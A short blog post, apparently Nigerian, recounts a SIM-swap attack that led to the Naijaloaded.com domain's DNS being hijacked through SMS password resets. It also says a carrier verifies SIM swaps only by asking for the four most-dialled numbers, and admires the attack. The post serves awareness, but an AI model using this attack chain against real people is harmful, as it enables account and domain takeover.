After the “hacker” swapped Naijaloaded’s owner SIM, he went on to use Yahoo’s Forgot Password Features which yahoo then sent the hacker a code (to the swapped sim), he then Changed his Yahoo Password after which the hacker requested for a Password Changing Note from Naijaloaded.com Domain Registrar and ended up changing Naijaloaded.com ‘s DNS.

A brilliant social engineering attack it was!

This clearly exposes vital security flaws in several customer service systems.

All a malicious person need know to hijack your SIM is your 4 most dial’d nos (your dad, mom, girlfriend, line manager, direct subordinate, etc).

You know what this means? You can directly intercept that scheduled business call by hijacking that Big Oga’s sim.

The guy that perpetrated this act not only digitally hacked the owner but they socially hacked him too as he could receive calls on his behalf.

It’s quite upsetting that the ecosystem that we’ve placed so much of our trust in(In this case Airtel) has let some of us down so thoroughly.

Social Engineering, albeit a new one in the Nigerian space, is here to stay. .Folks Are You Ready?

NB: I originally posted this blogpost here. You can follow-up the discussion there